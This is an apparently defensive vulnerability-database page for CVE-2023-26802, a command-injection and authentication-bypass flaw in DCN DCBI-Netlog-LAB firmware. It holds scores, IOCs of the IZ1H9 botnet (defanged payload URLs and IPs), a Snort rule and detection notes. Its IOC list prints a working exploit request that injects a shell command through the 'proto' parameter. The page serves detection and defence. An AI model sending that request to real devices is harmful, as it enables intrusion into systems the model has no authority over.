cbcvebase.
CVE-2023-26802
published 2023-03-26

CVE-2023-26802: An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and…

PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
48.71%
98.7th percentile
An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.

Affected

1 ranges
VendorProductVersion rangeFixed in
dcnglobaldcbi-netlog-lab_firmware

Detection & IOCsextracted from sources · hover to see the quote

path/network_config/nsg_masq.cgi
urlGET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/{{file_name}};
path/usr/local/lyx/lyxcenter/web/
ip163.123.143.126
urlhxxp://163.123.143[.]126/bins/dark.x86
urlhxxp://163.123.143[.]126/bins/dark.mips
urlhxxp://163.123.143[.]126/bins/dark.mpsl
urlhxxp://163.123.143[.]126/bins/dark.arm4
urlhxxp://163.123.143[.]126/bins/dark.arm5
urlhxxp://163.123.143[.]126/bins/dark.arm6
urlhxxp://163.123.143[.]126/bins/dark.arm7
urlhxxp://163.123.143[.]126/bins/dark.ppc
urlhxxp://163.123.143[.]126/bins/dark.m68k
urlhxxp://163.123.143[.]126/bins/dark.sh4
urlhxxp://163.123.143[.]126/bins/dark.86_64
urlhxxp://2.56.59[.]215/i.sh
urlhxxp://212.192.241[.]72/lolol.sh
ip2.56.59.215
ip195.133.40.141
urlhxxp://31.210.20[.]100/lolol[.]sh
urlhxxp://212.192.241[.]72/lolol[.]sh
urlhxxp://212.192.241[.]87/bins/
domaindotheneedfull[.]club
ip193.47.61.75
filenamelb.sh
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT DCN DCBI-Netlog-LAB Remote Code Execution Vulnerability Attempt (CVE-2023-26802)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/network_config/nsg_masq.cgi?"; startswith; fast_pattern; content:"&proto="; distance:0; pcre:"/(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9; reference:cve,2023-26802; classtype:attempted-admin; sid:2048549; rev:1; metadata:attack_target IoT, created_at 2023_10_12, cve CVE_2023_26802, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_10_12, reviewed_at 2023_10_12, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit requests target GET /cgi-bin/network_config/nsg_masq.cgi with the 'proto' parameter used for command injection (e.g., semicolon-delimited OS commands). The Snort/ET rule keys on URI prefix '/cgi-bin/network_config/nsg_masq.cgi?' combined with '&proto=' and presence of wget or curl in the URI.
  • The session_id parameter is set to '../' (path traversal) to bypass authentication in the exploit request.
  • Post-exploitation, the malware writes output files to /usr/local/lyx/lyxcenter/web/ and retrieves them via HTTP. Detect unexpected .html files appearing in that web root.
  • Verify exploitation by checking HTTP response body for presence of 'nsg_bridge.cgi' and 'nsg_dhcpactiveip.cgi' strings, which indicate directory listing output was written to the web root.
  • IZ1H9 botnet clients use XOR key 0xBAADF00D for configuration string decryption (bytewise: 0xBA^0xAD^0xF0^0x0D = 0xEA). Scan memory or binary for this key to identify IZ1H9 samples.
  • IZ1H9 uses a 1-byte XOR key 0x54 to encrypt embedded telnet/SSH brute-force credentials. Scan botnet binaries for this decryption pattern.
  • Palo Alto Networks Threat Prevention signatures 93386, 93718, 93721, 93722 cover the exploit traffic and malware associated with this campaign.
  • ·The IZ1H9 exploit function for the Tenda vulnerability mistakenly executes 'netlog.sh' instead of 'tenda.sh', meaning that specific exploit chain will not function correctly as coded in this sample.
  • ·The shell script downloader hash (692a5d099e37cd94923ea2) appears truncated in the source document and may be incomplete — verify against the original report before using as a detection hash.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.